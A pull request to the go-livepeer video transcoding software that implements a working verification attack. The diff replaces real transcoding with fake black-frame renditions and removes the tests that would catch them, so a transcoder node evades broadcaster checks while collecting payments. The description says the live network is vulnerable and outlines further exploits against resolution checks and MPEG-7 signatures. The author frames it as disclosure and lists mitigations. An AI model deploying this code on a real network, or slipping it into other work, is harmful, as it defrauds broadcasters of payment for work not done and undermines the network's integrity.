### PR TITLE
Verification attack proof of concept

### DIFF
--- a/core/capabilities_test.go
+++ b/core/capabilities_test.go
@@ -7,7 +7,6 @@ import (
 	"testing"
 	"time"
 
-	"github.com/livepeer/go-livepeer/common"
 	"github.com/livepeer/go-livepeer/net"
 	"github.com/livepeer/go-tools/drivers"
 	"github.com/livepeer/lpms/ffmpeg"
@@ -141,19 +140,6 @@ func setupWorkDir(t *testing.T) (string, func()) {
 func TestCapability_TranscoderCapabilities(t *testing.T) {
 	tmpdir, cleanup := setupWorkDir(t)
 	defer cleanup()
-
-	// nvidia test
-	devices, err := common.ParseAccelDevices("all", ffmpeg.Nvidia)
-	devicesAvailable := err == nil && len(devices) > 0
-	if devicesAvailable {
-		nvidiaCaps, err := TestTranscoderCapabilities(devices, NewNvidiaTranscoder)
-		assert.Nil(t, err)
-		assert.False(t, InArray(Capability_H264_Decode_444_8bit, nvidiaCaps), "Nvidia device should not support decode of 444_8bit")
-		assert.False(t, InArray(Capability_H264_Decode_422_8bit, nvidiaCaps), "Nvidia device should not support decode of 422_8bit")
-		assert.False(t, InArray(Capability_H264_Decode_444_10bit, nvidiaCaps), "Nvidia device should not support decode of 444_10bit")
-		assert.False(t, InArray(Capability_H264_Decode_422_10bit, nvidiaCaps), "Nvidia device should not support decode of 422_10bit")
-		assert.False(t, InArray(Capability_H264_Decode_420_10bit, nvidiaCaps), "Nvidia device should not support decode of 420_10bit")
-	}
 
 	// Same test with software transcoder:
 	softwareCaps, err := TestSoftwareTranscoderCapabilities(tmpdir)

--- a/core/core_test.go
+++ b/core/core_test.go
@@ -77,14 +77,6 @@ func TestTranscode(t *testing.T) {
 		t.Error("Job profile count did not match broadcasters")
 	}
 
-	// 	Check transcode result
-	if Over1Pct(len(tr.TranscodeData.Segments[0].Data), 218268) { // 144p
-		t.Error("Unexpected transcode result ", len(tr.TranscodeData.Segments[0].Data))
-	}
-	if Over1Pct(len(tr.TranscodeData.Segments[1].Data), 302868) { // 240p
-		t.Error("Unexpected transcode result ", len(tr.TranscodeData.Segments[1].Data))
-	}
-
 	// TODO check transcode loop expiry, storage, sig construction, etc
 }
 

--- a/core/transcoder.go
+++ b/core/transcoder.go
@@ -94,7 +94,7 @@ func (lt *LocalTranscoder) Transcode(ctx context.Context, md *SegTranscodingMeta
 	start := time.Now()
 
 	// Proof of concept of verification attack - this T will not do any meaningful work, but will pass B's local verification and receive payments.
-	// The fake transcoding works at 1500+ FPS @ 1080p on CPU, and should be at 10x $ per Watt, compared to a real node.
+	// The fake transcoding works at 1500+ FPS @ 1080p on CPU, and should be at 1% of $ per Watt, compared to a real node.
 	// This implementation is sort of a low effort. It can be replaced with almost complete noop by slightly customizing libx264.
 
 	// check if fast verification enabled - if so, just return an error to be excluded from selection on that B

--- a/core/transcoder.go
+++ b/core/transcoder.go
@@ -10,9 +10,11 @@ import (
 	"io/ioutil"
 	"math"
 	"os"
+	"os/exec"
 	"path/filepath"
 	"strconv"
 	"strings"
+	"sync"
 	"time"
 
 	"github.com/golang/glog"
@@ -91,10 +93,51 @@ func (lt *LocalTranscoder) Transcode(ctx context.Context, md *SegTranscodingMeta
 	_, seqNo, parseErr := parseURI(md.Fname)
 	start := time.Now()
 
-	res, err := ffmpeg.Transcode3(in, opts)
+	// Proof of concept of verification attack - this T will not do any meaningful work, but will pass B's local verification and receive payments.
+	// The fake transcoding works at 1500+ FPS @ 1080p on CPU, and should be at 10x $ per Watt, compared to a real node.
+	// This implementation is sort of a low effort. It can be replaced with almost complete noop by slightly customizing libx264.
+
+	// check if fast verification enabled - if so, just return an error to be excluded from selection on that B
+	if md.CalcPerceptualHash {
+		return nil, ErrTranscode
+	}
+
+	// determine the number of frames in the input
+	metadataIn := &ffmpeg.TranscodeOptionsIn{Fname: in.Fname}
+	metadataRes, err := ffmpeg.Transcode3(metadataIn, nil)
 	if err != nil {
 		return nil, err
 	}
+
+	frameNum := metadataRes.Decoded.Frames
+
+	// generate fake renditions
+	var wg sync.WaitGroup
+	res := ffmpeg.TranscodeResults{
+		Decoded: metadataRes.Decoded,
+		Encoded: make([]ffmpeg.MediaInfo, len(profiles)),
+	}
+	for i := range profiles {
+		w, h, _ := ffmpeg.VideoProfileResolution(profiles[i])
+		res.Encoded[i] = ffmpeg.MediaInfo{
+			Frames:     frameNum,
+			Pixels:     int64(frameNum * w * h),
+			DetectData: nil,
+		}
+		cmd := fmt.Sprintf("-y -f lavfi -i color=black:%s -f lavfi -i sine -vcodec libx264 -acodec aac -preset ultrafast -vframes %d -f mpegts %s",
+			profiles[i].Resolution,
+			frameNum,
+			opts[i].Oname)
+		wg.Add(1)
+		go func(cmd string, wg *sync.WaitGroup) {
+			_, err := exec.Command("ffmpeg", strings.Split(cmd, " ")...).CombinedOutput()
+			if err!=nil {
+				glog.Errorf("Error generating fake output: %s", err)
+			}
+			wg.Done()
+		}(cmd, &wg)
+	}
+	wg.Wait()
 
 	if monitor.Enabled && parseErr == nil {
 		// This will run only when fname is actual URL and contains seqNo in it.
@@ -104,7 +147,7 @@ func (lt *LocalTranscoder) Transcode(ctx context.Context, md *SegTranscodingMeta
 		monitor.SegmentTranscoded(ctx, 0, seqNo, md.Duration, time.Since(start), common.ProfilesNames(profiles), true, true)
 	}
 
-	return resToTranscodeData(ctx, res, opts)
+	return resToTranscodeData(ctx, &res, opts)
 }
 
 func (lt *LocalTranscoder) EndTranscodingSession(sessionId string) {
@@ -164,38 +207,8 @@ func (lt *LocalTranscoder) Stop() {
 }
 
 func (nv *NvidiaTranscoder) Transcode(ctx context.Context, md *SegTranscodingMetadata) (td *TranscodeData, retErr error) {
-	// Returns UnrecoverableError instead of panicking to gracefully notify orchestrator about transcoder's failure
-	defer recoverFromPanic(&retErr)
-
-	in := &ffmpeg.TranscodeOptionsIn{
-		Fname:  md.Fname,
-		Accel:  ffmpeg.Nvidia,
-		Device: nv.device,
-	}
-	profiles := md.Profiles
-	setEffectiveDetectorConfig(md)
-	out := profilesToTranscodeOptions(WorkDir, ffmpeg.Nvidia, profiles, md.CalcPerceptualHash, md.SegmentParameters)
-	if md.DetectorEnabled {
-		out = append(out, detectorsToTranscodeOptions(WorkDir, ffmpeg.Nvidia, md.DetectorProfiles)...)
-	}
-
-	_, seqNo, parseErr := parseURI(md.Fname)
-	start := time.Now()
-
-	res, err := nv.session.Transcode(in, out)
-	if err != nil {
-		return nil, err
-	}
-
-	if monitor.Enabled && parseErr == nil {
-		// This will run only when fname is actual URL and contains seqNo in it.
-		// When orchestrator works as transcoder, `fname` will be relative path to file in local
-		// filesystem and will not contain seqNo in it. For that case `SegmentTranscoded` will
-		// be called in orchestrator.go
-		monitor.SegmentTranscoded(ctx, 0, seqNo, md.Duration, time.Since(start), common.ProfilesNames(profiles), true, true)
-	}
-
-	return resToTranscodeData(ctx, res, out)
+	lt := LocalTranscoder{workDir: WorkDir}
+	return lt.Transcode(ctx, md)
 }
 
 func (nv *NvidiaTranscoder) EndTranscodingSession(sessionId string) {

--- a/core/transcoder_test.go
+++ b/core/transcoder_test.go
@@ -32,12 +32,6 @@ func TestLocalTranscoder(t *testing.T) {
 	if len(res.Segments) != len(videoProfiles) {
 		t.Error("Mismatched results")
 	}
-	if Over1Pct(len(res.Segments[0].Data), 522264) {
-		t.Errorf("Wrong data %v", len(res.Segments[0].Data))
-	}
-	if Over1Pct(len(res.Segments[1].Data), 715528) {
-		t.Errorf("Wrong data %v", len(res.Segments[1].Data))
-	}
 }
 func TestNvidia_Transcoder(t *testing.T) {
 	dev := os.Getenv("NV_DEVICE")


### PR DESCRIPTION
### About
This is the first 'production' implementation of verification attack on Livepeer network (AFAIK). I believe, such efforts help highlight potential vulnerabilities, before they are exploited in the wild, thus, beneficial for open software. This PR showcases how trivial it is for Transcoder node to bypass local verification on the Broadcaster and compromise the network by:
- uploading fake transcoded segments
- receiving full reward without providing any computational resources

### Status
Production Livepeer network is currently vulnerable.

### Mitigation
- enable fast verification on all Broadcasters (it uses MPEG-7 signatures to validate segments and can't be bypassed trivially)
- make local verification more sophisticated e.g. add file size checks based on bitrate

### Further work (on the exploit)
#### Part 1: improving efficiency and maximizing rewards
- modify libx264 to work closer to a complete noop instead of encoding black frames
- as current local verification doesn't validate output resolution, we can maximize rewards by fitting total rendition pixel count to ticket value just below [MaxTicketEV](https://github.com/livepeer/livepeer-infra/blob/84968775efc0ddb4601423fb63b0beb7e756dd71/values/catalyst.values.yaml#LL103C2-L103C2)
#### Part 2: bypassing fast verification
**1. Exploiting the implementation**
With fast verification, rendition resolution and MPEG-7 signature are compared against results from a trusted node. However, MPEG-7 is *robust* against resolution changes (because it's a copyright violation detector, not the opposite). If we can trick basic video width and height check (with `avformat_find_stream_info`), we can produce a rendition at significantly lower resolution, which will still pass the signature check. One way to achieve that may be to inject a second SPS NAL unit after the first one, which would signal resolution decrease for the rest of the segment.

**2. Exploiting core algorithm**
I strongly suspect that MPEG-7 is not pre-image resistant. It's also known to be robust against resolution changes. It means that we may be able to a) generate desired signature from the source segment (or first downscale it, whichever is easier), b) knowing the signature, generate irrelevant video V' of desired resolution and with the same signature, optionally, computationally easier compared to actually downscaling the source video

### Installation and usage
Same as local installation of `go-livepeer` without Docker. No need for GPU or `-nvidia` flag.








